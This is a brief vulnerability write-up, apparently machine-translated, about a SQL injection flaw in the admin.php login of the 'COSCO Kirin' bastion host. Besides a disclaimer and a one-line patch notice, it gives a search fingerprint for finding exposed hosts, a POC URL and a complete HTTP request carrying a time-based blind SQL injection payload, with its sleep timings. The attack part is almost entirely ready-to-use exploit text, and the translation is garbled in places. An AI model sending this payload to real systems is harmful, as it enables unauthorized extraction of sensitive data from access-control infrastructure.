Statement:
This article is only for technical exchanges. Please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user himself. The author of the article does not bear any responsibility for this. responsibility.
I. Overview
COSCO Kirin Bastion Host can provide fine-grained access control to maximize the security of user resources. Kirin Bastion has a SQL injection vulnerability.
| Vulnerability level | high risk |
| Vulnerability impact | COSCO Kirin Fortress aircraft |
| FLY | cert.subject="Baolei" |
2. Vulnerability hazards
There is a sql injection vulnerability in the admin.php interface of COSCO Kirin Fortress. An attacker can use this vulnerability to obtain sensitive database information and drag libraries.
3. Recurrence of vulnerabilities
login interface
POC:
https://ip:port/admin.php?controller=admin_commonuser
If this echo appears, it indicates that the vulnerability exists.
EXP:
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1Burp starts! ! !
sleep5 seconds
sleep10 seconds
4. Repair suggestions
The official patch has been released, please upgrade.